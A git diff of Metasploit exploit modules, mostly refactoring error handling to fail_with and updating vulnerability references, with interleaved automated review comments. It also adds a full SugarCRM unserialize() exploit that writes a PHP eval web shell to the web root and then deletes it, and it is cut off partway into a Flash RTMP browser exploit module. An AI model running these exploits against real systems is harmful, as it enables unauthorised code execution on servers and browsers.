diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb
index 64c37467cc..b927a91c92 100644
--- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb
+++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb
@@ -217,11 +217,11 @@ class Metasploit3 < Msf::Exploit::Remote
uri_path = datastore['URI'] || target['DefaultURI']
if(not cookie_name)
- raise RuntimeError, "The COOKIENAME option must be set"
+ fail_with(Exploit::Failure::Unknown, "The COOKIENAME option must be set")
end
if(not uri_path)
- raise RuntimeError, "The URI option must be set"
+ fail_with(Exploit::Failure::Unknown, "The URI option must be set")
end
res = send_request_cgi({
@@ -321,11 +321,11 @@ class Metasploit3 < Msf::Exploit::Remote
uri_path = datastore['URI'] || target['DefaultURI']
if(not cookie_name)
- raise RuntimeError, "The COOKIENAME option must be set"
+ fail_with(Exploit::Failure::Unknown, "The COOKIENAME option must be set")
end
if(not uri_path)
- raise RuntimeError, "The URI option must be set"
+ fail_with(Exploit::Failure::Unknown, "The URI option must be set")
end
# Generate and reuse the original buffer to save CPU
@@ -423,7 +423,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_line("*" * 40)
print_line('')
- raise RuntimeError, "Exploit settings are probably wrong"
+ fail_with(Exploit::Failure::Unknown, "Exploit settings are probably wrong")
end
else
print_status("No response from the server")
diff --git a/modules/exploits/multi/svn/svnserve_date.rb b/modules/exploits/multi/svn/svnserve_date.rb
index 285f492539..d8867a4121 100644
--- a/modules/exploits/multi/svn/svnserve_date.rb
+++ b/modules/exploits/multi/svn/svnserve_date.rb
@@ -114,12 +114,12 @@ class Metasploit3 < Msf::Exploit::Remote
if (sock.put(buf) || 0) == 0 and index < 3
print_error("Error transmitting buffer.")
- raise ExploitError, "Failed to transmit data" if !datastore['IgnoreErrors']
+ fail_with(Exploit::Failure::Unknown, "Failed to transmit data") if !datastore['IgnoreErrors']
end
if index == 3 and trash.length > 0
print_error("Received data when we shouldn't have")
- raise ExploitError, "Received data when it wasn't expected" if !datastore['IgnoreErrors']
+ fail_with(Exploit::Failure::Unknown, "Received data when it wasn't expected") if !datastore['IgnoreErrors']
end
}
diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb
index 38f5bafc5e..62ab1a5180 100644
--- a/modules/exploits/osx/browser/safari_file_policy.rb
+++ b/modules/exploits/osx/browser/safari_file_policy.rb
@@ -262,7 +262,7 @@ class Metasploit3 < Msf::Exploit::Remote
#
def use_zlib
if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
- raise RuntimeError, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!"
+ fail_with(Exploit::Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")
end
end
diff --git a/modules/exploits/osx/browser/safari_metadata_archive.rb b/modules/exploits/osx/browser/safari_metadata_archive.rb
index 327556b811..84a61f4a94 100644
--- a/modules/exploits/osx/browser/safari_metadata_archive.rb
+++ b/modules/exploits/osx/browser/safari_metadata_archive.rb
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check_dependencies
@zip = (Rex::FileUtils::find_full_path('7za') || Rex::FileUtils::find_full_path('7za.exe'))
return if @zip
- raise RuntimeError, "This exploit requires the zip command to be installed in your path"
+ fail_with(Exploit::Failure::Unknown, "This exploit requires the zip command to be installed in your path")
end
def on_request_uri(cli, request)
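Review bot: `check_dependencies` searches for `7za` or `7za.exe`, but the text passed to `fail_with` says the zip command is required, which sends the operator looking for the wrong tool. Because this is a missing local prerequisite, `fail_with(Exploit::Failure::BadConfig, "This exploit requires 7za (7-Zip) to be installed in your path")` would describe it accurately.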
diff --git a/modules/exploits/osx/mdns/upnp_location.rb b/modules/exploits/osx/mdns/upnp_location.rb
index c800a9921d..acdfb62d9d 100644
--- a/modules/exploits/osx/mdns/upnp_location.rb
+++ b/modules/exploits/osx/mdns/upnp_location.rb
@@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
socket = Rex::Socket.create_udp
- upnp_location = "http://" + datastore['LHOST'] + ":" + datastore['SRVPORT']
+ upnp_location = "http://" + datastore['LHOST'] + ":" + datastore['SRVPORT'].to_s
print_status("Listening for UPNP requests on: #{upnp_location}")
print_status("Sending UPNP Discovery replies...")
@@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote
upnp_port = scan_for_upnp_port()
if upnp_port == 0
- raise "Could not find listening UPNP UDP socket"
+ fail_with(Exploit::Failure::Unreachable, "Could not find listening UPNP UDP socket")
end
datastore['RPORT'] = upnp_port
diff --git a/modules/exploits/unix/http/freepbx_callmenum.rb b/modules/exploits/unix/http/freepbx_callmenum.rb
index 01cfaecdae..505e9a5d9e 100644
--- a/modules/exploits/unix/http/freepbx_callmenum.rb
+++ b/modules/exploits/unix/http/freepbx_callmenum.rb
@@ -32,6 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' =>
[
+ [ 'CVE', '2005-2561' ],
[ 'EDB', '18649' ]
],
'Platform' => ['unix'],
diff --git a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb
index 9a6a883b95..750b6aa16c 100644
--- a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb
+++ b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2007-4560' ],
[ 'OSVDB', '36909' ],
[ 'BID', '25439' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/4761' ],
+ [ 'EDB', '4761' ]
],
'Privileged' => true,
'Payload' =>
diff --git a/modules/exploits/unix/smtp/exim4_string_format.rb b/modules/exploits/unix/smtp/exim4_string_format.rb
index 38d923e4a1..ae7a6f10f2 100644
--- a/modules/exploits/unix/smtp/exim4_string_format.rb
+++ b/modules/exploits/unix/smtp/exim4_string_format.rb
@@ -115,11 +115,11 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Server: #{self.banner.to_s.strip}")
if self.banner.to_s !~ /Exim /
disconnect
- raise RuntimeError, "The target server is not running Exim!"
+ fail_with(Exploit::Failure::NoTarget, "The target server is not running Exim!")
end
if not datastore['SkipVersionCheck'] and self.banner !~ /Exim 4\.6\d+/i
- raise RuntimeError, "Warning: This version of Exim is not exploitable"
+ fail_with(Exploit::Failure::Unknown, "Warning: This version of Exim is not exploitable")
end
ehlo_resp = raw_send_recv("EHLO #{ehlo}\r\n")
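Review bot: The version check ends the run, yet its message still begins with "Warning:" and it is filed under `Exploit::Failure::Unknown`, whereas the banner check just above uses `Exploit::Failure::NoTarget` for the same kind of mismatch. It also omits the `disconnect` that the first branch performs before failing; whether `fail_with` closes the connection itself is not visible here. Suggested: `disconnect` followed by `fail_with(Exploit::Failure::NoTarget, "This version of Exim is not exploitable")`. The enclosing method extends beyond the hunk.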
@@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
resp ||= 'no response'
msg = "MAIL: #{resp.strip}"
if not resp or resp[0,3] != '250'
- raise RuntimeError, msg
+ fail_with(Exploit::Failure::Unknown, msg)
else
print_status(msg)
end
@@ -167,7 +167,7 @@ class Metasploit3 < Msf::Exploit::Remote
resp ||= 'no response'
msg = "RCPT: #{resp.strip}"
if not resp or resp[0,3] != '250'
- raise RuntimeError, msg
+ fail_with(Exploit::Failure::Unknown, msg)
else
print_status(msg)
end
@@ -176,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
resp ||= 'no response'
msg = "DATA: #{resp.strip}"
if not resp or resp[0,3] != '354'
- raise RuntimeError, msg
+ fail_with(Exploit::Failure::Unknown, msg)
else
print_status(msg)
end
@@ -289,7 +289,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Check output for success
if second_result !~ /(MAIL|RCPT|sh: |sh-[0-9]+)/
print_error("Second result: #{second_result.inspect}")
- raise RuntimeError, 'Something went wrong, perhaps this host is patched?'
+ fail_with(Exploit::Failure::Unknown, 'Something went wrong, perhaps this host is patched?')
end
resp = ''
diff --git a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb
index 8ccfe2e8f0..d0fe3a3f62 100644
--- a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb
+++ b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb
@@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
cmd = payload.encoded
if not post(cmd, true)
- raise RuntimeError, "Unable to execute the desired command"
+ fail_with(Exploit::Failure::Unknown, "Unable to execute the desired command")
end
end
end
diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb
index 27c7f7bb7c..e24b4b224f 100644
--- a/modules/exploits/unix/webapp/coppermine_piceditor.rb
+++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb
@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (res and res.code == 200)
print_status("Successfully POST'd exploit data")
else
- raise RuntimeError, "Error POSTing exploit data"
+ fail_with(Exploit::Failure::Unknown, "Error POSTing exploit data")
end
handler
diff --git a/modules/exploits/unix/webapp/joomla_tinybrowser.rb b/modules/exploits/unix/webapp/joomla_tinybrowser.rb
index 68efafa3ec..15b04ee0ab 100644
--- a/modules/exploits/unix/webapp/joomla_tinybrowser.rb
+++ b/modules/exploits/unix/webapp/joomla_tinybrowser.rb
@@ -31,6 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
+ ['CVE', '2011-4908'],
['OSVDB', '64578'],
['EDB', 9296],
['URL', 'http://developer.joomla.org/security/news/301-20090722-core-file-upload.html'],
diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb
index 0bebff011c..7b4554ba48 100644
--- a/modules/exploits/unix/webapp/openx_banner_edit.rb
+++ b/modules/exploits/unix/webapp/openx_banner_edit.rb
@@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Need to login first :-/
cookie = openx_login(uri_base)
if (not cookie)
- raise RuntimeError, 'Unable to login!'
+ fail_with(Exploit::Failure::Unknown, 'Unable to login!')
end
print_status("Logged in successfully (cookie: #{cookie})")
@@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote
ids = openx_find_campaign(uri_base, cookie)
if (not ids)
# TODO: try to add an advertiser and/or campaign
- raise RuntimeError, 'The system has no advertisers or campaigns!'
+ fail_with(Exploit::Failure::Unknown, 'The system has no advertisers or campaigns!')
end
adv_id = ids[0]
camp_id = ids[1]
@@ -139,14 +139,14 @@ class Metasploit3 < Msf::Exploit::Remote
# Add the banner >:)
ban_id = openx_upload_banner(uri_base, cookie, adv_id, camp_id, content)
if (not ban_id)
- raise RuntimeError, 'Unable to upload the banner!'
+ fail_with(Exploit::Failure::Unknown, 'Unable to upload the banner!')
end
print_status("Successfully uploaded the banner image with id #{ban_id}")
# Find the filename
ban_fname = openx_find_banner_filename(uri_base, cookie, adv_id, camp_id, ban_id)
if (not ban_fname)
- raise RuntimeError, 'Unable to find the banner filename!'
+ fail_with(Exploit::Failure::Unknown, 'Unable to find the banner filename!')
end
print_status("Resolved banner id to name: #{ban_fname}")
diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb
index c66141b0af..52cd4fa554 100644
--- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb
+++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb
@@ -158,7 +158,7 @@ EOS
cmd ||= payload.encoded
if not go(cmd)
- raise RuntimeError, "Unable to execute the desired command"
+ fail_with(Exploit::Failure::Unknown, "Unable to execute the desired command")
end
handler
diff --git a/modules/exploits/unix/webapp/oscommerce_filemanager.rb b/modules/exploits/unix/webapp/oscommerce_filemanager.rb
index 1be874541e..6980a05d00 100644
--- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb
+++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'References' =>
[
[ 'OSVDB', '60018' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/9556' ]
+ [ 'EDB', '9556' ]
],
'Privileged' => false,
'Platform' => ['php'],
diff --git a/modules/exploits/unix/webapp/php_vbulletin_template.rb b/modules/exploits/unix/webapp/php_vbulletin_template.rb
index 8d6e9af143..d8985d25e4 100644
--- a/modules/exploits/unix/webapp/php_vbulletin_template.rb
+++ b/modules/exploits/unix/webapp/php_vbulletin_template.rb
@@ -87,9 +87,9 @@ class Metasploit3 < Msf::Exploit::Remote
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
- raise RuntimeError, 'Target PHP installation does not support chunked encoding. ' +
+ fail_with(Exploit::Failure::Unknown, 'Target PHP installation does not support chunked encoding. ' +
'Support for chunked encoded requests was added to PHP on 12/15/2005. ' +
- 'Try disabling HTTP::chunked and trying again.'
+ 'Try disabling HTTP::chunked and trying again.')
end
end
end
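Review bot: The failure reason in this call is `Exploit::Failure::Unknown`, while the identical check in php_xmlrpc_eval.rb, changed in this same commit, uses `Exploit::Failure::BadConfig`. The message tells the operator to change the HTTP::chunked option, so `BadConfig` fits both; the first line of the call would become `fail_with(Exploit::Failure::BadConfig, 'Target PHP installation does not support chunked encoding. ' +`. The operator-input checks in tikiwiki_graph_formula_exec.rb (invalid character in 'f') and ams_hndlrsvc.rb (command longer than 128 characters) likewise report `Unknown` for a cause that is known. The enclosing method starts and ends outside the hunk.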
diff --git a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb
index 726ae05ffd..eab6532dff 100644
--- a/modules/exploits/unix/webapp/php_xmlrpc_eval.rb
+++ b/modules/exploits/unix/webapp/php_xmlrpc_eval.rb
@@ -92,9 +92,9 @@ class Metasploit3 < Msf::Exploit::Remote
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
- raise RuntimeError, 'Target PHP installation does not support chunked encoding. ' +
+ fail_with(Exploit::Failure::BadConfig, 'Target PHP installation does not support chunked encoding. ' +
'Support for chunked encoded requests was added to PHP on 12/15/2005. ' +
- 'Try disabling HTTP::chunked and trying again.'
+ 'Try disabling HTTP::chunked and trying again.')
end
end
end
diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb
index e16c70627e..fc5bc113a5 100644
--- a/modules/exploits/unix/webapp/phpmyadmin_config.rb
+++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb
@@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'CVE', '2009-1151' ],
[ 'OSVDB', '53076' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/8921' ],
+ [ 'EDB', '8921' ],
[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php' ],
[ 'URL', 'http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/' ]
],
@@ -82,11 +82,11 @@ class Metasploit3 < Msf::Exploit::Remote
uri = datastore['URI'] + "scripts/setup.php"
response = send_request_raw({ 'uri' => uri})
if !response
- raise RuntimeError.new("Server did not respond to our initial request")
+ fail_with(Exploit::Failure::NotFound, "Failed to retrieve hash, server may not be vulnerable.")
return
end
if (response.body !~ /"token"\s*value="([^"]*)"/)
- raise RuntimeError.new("Couldn't find token and can't continue without it. Is URI set correctly?")
+ fail_with(Exploit::Failure::NotFound, "Couldn't find token and can't continue without it. Is URI set correctly?")
return
end
token = $1
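Review bot: The message on the `if !response` branch was replaced with "Failed to retrieve hash, server may not be vulnerable.", which no longer describes the condition: no response arrived, and this code looks for a token, not a hash. The text appears to be copied from sphpblog_file_upload.rb. Keeping the original wording would be accurate, e.g. `fail_with(Exploit::Failure::Unreachable, "Server did not respond to our initial request")`. Because fail_with raises, the `return` after each call in this hunk is unreachable and can be dropped, as can `return false` in the sphpblog_file_upload.rb hunk. The method body continues outside the hunk.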
diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb
index d8834be8e1..bbf6c12be1 100644
--- a/modules/exploits/unix/webapp/redmine_scm_exec.rb
+++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb
@@ -31,6 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
+ ['CVE', '2011-4929'],
['OSVDB', '70090'],
['URL', 'http://www.redmine.org/news/49' ]
],
diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb
index a8849aa592..9aa86df648 100644
--- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb
+++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb
@@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Successfully retrieved hash: #{res.body}")
return res.body
else
- raise RuntimeError.new("Failed to retrieve hash, server may not be vulnerable.")
+ fail_with(Exploit::Failure::NotVulnerable, "Failed to retrieve hash, server may not be vulnerable.")
return false
end
end
diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
new file mode 100644
index 0000000000..c2b8fd32bb
--- /dev/null
+++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
@@ -0,0 +1,156 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'SugarCRM <= 6.3.1 unserialize() PHP Code Execution',
+ 'Description' => %q{
+ This module exploits a php unserialize() vulnerability in SugarCRM <= 6.3.1
+ which could be abused to allow authenticated SugarCRM users to execute arbitrary
+ code with the permissions of the webserver.
+
+ The dangerous unserialize() exists in the 'include/MVC/View/views/view.list.php'
+ script, which is called with user controlled data from the 'current_query_by_page'
+ parameter. The exploit abuses the __destruct() method from the SugarTheme class
+ to write arbitrary PHP code to a 'pathCache.php' on the web root.
+ },
+ 'Author' =>
+ [
+ 'EgiX', # Vulnerability discovery and PoC
+ 'juan vazquez', # Metasploit module
+ 'sinn3r' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'CVE', '2012-0694' ],
+ [ 'EDB', '19381' ],
+ [ 'URL', 'http://www.sugarcrm.com/forums/f22/critical-security-vulnerability-76537/' ]
+ ],
+ 'Privileged' => false,
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ },
+ 'Targets' => [ ['Automatic', { }], ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jun 23 2012'
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, "The base path to the web application", "/sugarcrm/"]),
+ OptString.new('USERNAME', [true, "The username to authenticate with" ]),
+ OptString.new('PASSWORD', [true, "The password to authenticate with" ])
+ ], self.class)
+ end
+
+
+ def on_new_session(client)
+ if client.type == "meterpreter"
+ f = "pathCache.php"
+ client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
+ begin
+ client.fs.file.rm(f)
+ print_good("#{@peer} - #{f} removed to stay ninja")
+ rescue
+ print_error("#{@peer} - Unable to remove #{f}")
+ end
+ end
+ end
+
+ def exploit
+ base = target_uri.path
+ base << '/' if base[-1, 1] != '/'
+
+ @peer = "#{rhost}:#{rport}"
+ username = datastore['USERNAME']
+ password = datastore['PASSWORD']
+
+ # Can't use vars_post because it'll escape "_"
+ data = "module=Users&"
+ data << "action=Authenticate&"
+ data << "user_name=#{username}&"
+ data << "user_password=#{password}"
+
+ res = send_request_cgi(
+ {
+ 'uri' => "#{base}index.php" ,
+ 'method' => "POST",
+ 'headers' =>
+ {
+ 'Cookie' => "PHPSESSID=1",
+ },
+ 'data' => data
+ })
+
+ if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie']
+ print_error("#{@peer} - Login failed with \"#{username}:#{password}\"")
+ return
+ end
+
+ if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/
+ session_id = $1
+ else
+ print_error("#{@peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
+ return
+ end
+
+ print_status("#{@peer} - Login successful with #{username}:#{password}")
+
+ data = "module=Contacts&"
+ data << "Contacts2_CONTACT_offset=1&"
+ data << "current_query_by_page="
+ #O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"";}
+ data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30="
+
+ print_status("#{@peer} - Exploiting the unserialize()")
+
+ res = send_request_cgi(
+ {
+ 'uri' => "#{base}index.php",
+ 'method' => 'POST',
+ 'headers' =>
+ {
+ 'Cookie' => "PHPSESSID=#{session_id};",
+ },
+ 'data' => data
+ })
+
+ if not res or res.code != 200
+ print_error("#{@peer} - Exploit failed: #{res.code}")
+ return
+ end
+
+ print_status("#{@peer} - Executing the payload")
+
+ res = send_request_cgi(
+ {
+ 'method' => 'GET',
+ 'uri' => "#{base}pathCache.php",
+ 'headers' => {
+ 'Cmd' => Rex::Text.encode_base64(payload.encoded)
+ }
+ })
+
+ if res
+ print_error("#{@peer} - Payload execution failed: #{res.code}")
+ return
+ end
+
+ end
+end
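Review bot: In `exploit`, the branch `if not res or res.code != 200` prints `#{res.code}`, which raises NoMethodError when `res` is nil, so a missing response surfaces as a stack trace instead of a failure message. A single line covers both cases: `fail_with(Exploit::Failure::Unknown, "#{@peer} - Exploit failed: #{res ? res.code : 'no response'}")`. USERNAME and PASSWORD are interpolated into the POST body without URL-encoding, so a credential containing `&`, `=` or `%` is sent as a different value. The password is also echoed in clear text by three print_* calls and will land in console logs and saved output; printing only the username is enough. The module reports failures with print_error plus `return`, while the rest of this commit moves modules to fail_with.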
diff --git a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
index 755ddb5430..05d9b5c4ba 100644
--- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
+++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
@@ -192,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote
# 3. cannot use `, ', ", or space
if (f_val.index('\'') or f_val.index('"') or f_val.index('`') or f_val.index(' '))
- raise RuntimeError, "The value for the 'f' variable contains an invalid character!"
+ fail_with(Exploit::Failure::Unknown, "The value for the 'f' variable contains an invalid character!")
end
# 4. the function must be one of:
diff --git a/modules/exploits/unix/webapp/trixbox_langchoice.rb b/modules/exploits/unix/webapp/trixbox_langchoice.rb
index fd230a6473..23ea4e04d5 100644
--- a/modules/exploits/unix/webapp/trixbox_langchoice.rb
+++ b/modules/exploits/unix/webapp/trixbox_langchoice.rb
@@ -146,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote
# The call should return status code 200
if delivery_response.code != 200
- raise RuntimeError, "Server returned unexpected HTTP code #{delivery_response.code}"
+ fail_with(Exploit::Failure::NotFound, "Server returned unexpected HTTP code #{delivery_response.code}")
end
print_status "The server responded to POST with HTTP code #{delivery_response.code}"
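Review bot: `Exploit::Failure::NotFound` is used here for a response that did arrive but carried an unexpected status code; `Exploit::Failure::UnexpectedReply` describes that case, e.g. `fail_with(Exploit::Failure::UnexpectedReply, "Server returned unexpected HTTP code #{delivery_response.code}")`. The two later hunks in this file (no cookies set, PHPSESSID not set) are the same kind of condition and would take the same reason. If `delivery_response` can be nil at this point, `.code` raises before the check is reached; the assignment is outside the hunk, so that needs confirming against the full method.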
@@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Make sure cookies were set
if cookies.nil?
- raise RuntimeError, 'The server did not set any cookies'
+ fail_with(Exploit::Failure::NotFound, 'The server did not set any cookies')
end
# Contents of PHPSESSID. About to be set.
@@ -166,7 +166,7 @@ class Metasploit3 < Msf::Exploit::Remote
if cookies =~ PHPSESSID_REGEX
session_id = $1
else
- raise RuntimeError, 'The cookie PHPSESSID was not set.'
+ fail_with(Exploit::Failure::NotFound, 'The cookie PHPSESSID was not set.')
end
print_status "We were assigned a session id (cookie PHPSESSID) of '#{session_id}'"
diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb
index cd75932e27..60992ffeb8 100644
--- a/modules/exploits/unix/webapp/twiki_history.rb
+++ b/modules/exploits/unix/webapp/twiki_history.rb
@@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (res and res.code == 200)
print_status("Successfully sent exploit request")
else
- raise RuntimeError, "Error sending exploit request"
+ fail_with(Exploit::Failure::Unknown, "Error sending exploit request")
end
handler
diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb
index 07ab33b384..8d53310d6c 100644
--- a/modules/exploits/unix/webapp/twiki_search.rb
+++ b/modules/exploits/unix/webapp/twiki_search.rb
@@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (res and res.code == 200)
print_status("Successfully sent exploit request")
else
- raise RuntimeError, "Error sending exploit request"
+ fail_with(Exploit::Failure::Unknown, "Error sending exploit request")
end
handler
diff --git a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
index 96282f0953..2e0bd31649 100644
--- a/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
+++ b/modules/exploits/windows/antivirus/ams_hndlrsvc.rb
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
connect
if ( cmd.length > 128 )
- raise RuntimeError,"Command strings greater then 128 characters will not be processed!"
+ fail_with(Exploit::Failure::Unknown, "Command strings greater then 128 characters will not be processed!")
end
string_uno = Rex::Text.rand_text_alpha_upper(11)
@@ -167,7 +167,7 @@ class Metasploit3 < Msf::Exploit::Remote
when 'win'
windows_stager
else
- raise RuntimeError, 'Target not supported.'
+ fail_with(Exploit::Failure::Unknown, 'Target not supported.')
end
handler
diff --git a/modules/exploits/windows/antivirus/ams_xfr.rb b/modules/exploits/windows/antivirus/ams_xfr.rb
index 7ae811ee0b..be629648df 100644
--- a/modules/exploits/windows/antivirus/ams_xfr.rb
+++ b/modules/exploits/windows/antivirus/ams_xfr.rb
@@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
when 'win'
windows_stager
else
- raise RuntimeError, 'Target not supported.'
+ fail_with(Exploit::Failure::Unknown, 'Target not supported.')
end
handler
diff --git a/modules/exploits/windows/brightstor/discovery_tcp.rb b/modules/exploits/windows/brightstor/discovery_tcp.rb
index a38e557d8c..a495f6f556 100644
--- a/modules/exploits/windows/brightstor/discovery_tcp.rb
+++ b/modules/exploits/windows/brightstor/discovery_tcp.rb
@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'OSVDB', '13814'],
[ 'BID', '12536'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html'],
- [ 'URL', 'http://milw0rm.com/exploits/1131'],
+ [ 'EDB', '1131']
],
'Privileged' => true,
'Payload' =>
diff --git a/modules/exploits/windows/brightstor/tape_engine.rb b/modules/exploits/windows/brightstor/tape_engine.rb
index eec3319e61..e60158de8c 100644
--- a/modules/exploits/windows/brightstor/tape_engine.rb
+++ b/modules/exploits/windows/brightstor/tape_engine.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2006-6076' ],
[ 'OSVDB', '30637' ],
[ 'BID', '21221' ],
- [ 'URL', 'http://www.milw0rm.com/exploits/3086' ],
+ [ 'EDB', '3086' ],
[ 'URL', 'http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=101317' ],
],
'Privileged' => true,
diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
new file mode 100644
index 0000000000..09f9b4a4fa
--- /dev/null
+++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
@@ -0,0 +1,490 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::Remote::BrowserAutopwn
+
+ autopwn_info({
+ :os_name => OperatingSystems::WINDOWS,
+ :ua_name => HttpClients::IE,
+ :ua_minver => "6.0",
+ :ua_maxver => "8.0",
+ :method => "GetVariable",
+ :classid => "ShockwaveFlash.ShockwaveFlash",
+ :rank => NormalRanking, # reliable memory corruption
+ :javascript => true
+ })
+
